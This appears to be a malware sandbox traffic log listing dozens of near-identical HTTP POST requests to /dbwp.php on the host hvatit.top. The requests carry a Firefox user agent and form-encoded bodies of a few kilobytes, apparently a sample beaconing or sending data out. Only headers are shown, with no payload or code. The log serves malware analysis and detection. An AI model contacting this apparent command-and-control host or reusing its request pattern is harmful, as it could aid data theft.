                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global traffic HTTP traffic detected: POST /dbwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: hvatit.top Content-Length: 2552 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /dbwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: hvatit.top Content-Length: 1420 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /dbwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: hvatit.top Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /dbwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: hvatit.top Content-Length: 2552 Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
